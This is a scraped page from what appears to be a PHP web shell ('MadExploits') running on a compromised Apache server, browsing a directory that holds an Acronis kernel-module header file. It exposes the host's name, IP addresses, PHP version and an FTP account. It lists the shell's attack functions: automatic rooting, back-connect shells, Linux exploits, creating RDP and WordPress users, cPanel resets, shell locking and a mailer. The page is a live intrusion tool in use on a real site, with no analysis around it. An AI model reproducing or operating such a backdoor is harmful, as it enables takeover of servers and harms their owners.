Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
file_protector-1.1-1538 /
lsm_hooks /
[ HOME SHELL ]
Name
Size
Permission
Action
lsm_common.c
6.2
KB
-rw-r--r--
lsm_common.h
1.53
KB
-rw-r--r--
lsm_pre_events.c
26.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lsm_common.h
/** @file lsm_common.h @brief LSM based hooks @details Copyright (c) 2024 Acronis International GmbH @author Bruce Wang (bruce.wang@acronis.com) @since $Id: $ */ #pragma once #include "debug.h" // #define APL_LSM_DEBUG #ifdef APL_LSM_DEBUG #define print_address_symbol(addr) IPRINTF("[%s]: %p->%pS", #addr, (void *)addr, (void *)addr); #define print_hooks(security_hook_heads_addr, hook_name) \ { \ struct security_hook_list *hook_node; \ rcu_read_lock(); \ hlist_for_each_entry(hook_node, &security_hook_heads_addr->hook_name, list) \ { \ print_address_symbol(hook_node->hook.hook_name); \ } \ rcu_read_unlock(); \ } #else #define print_address_symbol(addr) #define print_hooks(hook_list, hook_name) #endif bool syscall_replaced_by_lsm(int syscall_nr, bool ia32); int lsm_hooks_init(void); void lsm_hooks_exit(void); uint64_t wanted_fsnotify_events(void); bool lsm_registered(void); bool lsm_has_open(void); bool lsm_has_security_path(void); bool lsm_has_complex_post(void); int register_lsm_pre_events(void); void unregister_lsm_pre_events(void);
Close